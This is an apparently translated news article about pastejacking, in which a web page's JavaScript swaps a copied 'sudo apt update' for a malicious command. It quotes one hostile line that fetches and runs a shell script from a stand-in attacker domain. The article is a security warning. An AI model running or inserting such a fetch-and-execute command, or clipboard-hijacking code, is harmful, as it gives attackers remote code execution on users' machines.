Programmers, system administrators, security researchers, and those who like to tweak their PCs have a habit of copying and pasting commonly used commands from a web page. Only and as the specialist Gabriel Friedlander reminds us, this practice is not without risk. Far from there.
Copy and paste is one of the most commonly used manipulations, whether by ordinary users, programmers, system administrators, IT security researchers or even those who like to hack their PC. Only, Gabriel Friendlander, founder of the computer security training platform Wizer, would like to remind you that this practice is far from risk-free, especially when it comes to copy and paste commands displayed on web pages.
Indeed, it is not uncommon for developers, novices as well as experienced, to copy and paste commonly used commands from a web page (StackOverflow for example) into their applications, in a Windows command prompt or in a terminal. Linux.
But as Mr. Friendlander reminds us, there is a method which allows an attacker to modify the contents of your clipboard. PastJacking, that’s its name, consists of the introduction of malicious lines of code that will be automatically executed when the user is going to paste their text in a terminal window. In a rather straightforward proof of concept posted on his personal blog, Mr. Friedlander asks readers to copy a command that most sysadmins and developers are familiar with: sudo apt udpate (ndrl: a command used to retrieve updated information about the software installed on your system).
Read also: Windows 11 – Microsoft wants to revolutionize copy and paste on Edge and Chrome
Copy and paste can do a lot of damage
By copying and pasting this command in a text box or notepad, we realize that the content is totally different. Indeed, the sudo apt update command has become curl http: // attacker-domain: 8000 / shell.sh | sh. In reality, the deception is in the Javascript code hidden behind the HTML page of the proof of concept set up by Friendlander.
To put it simply, as soon as you copy the command “sudo apt update” into an HTML element, the malicious piece of code shown below is executed. More precisely, it is a javascript event listener that captures the copy event and replaces the data in the clipboard with malicious code from Mr. Friedlander. “This is why you should never copy and paste commands directly into your terminal. […] It only takes a single line of code injected into the code you copied to create a backdoor in your application. This attack is very simple, but particularly effective ”, he warns.
Source: Bleeding Computer
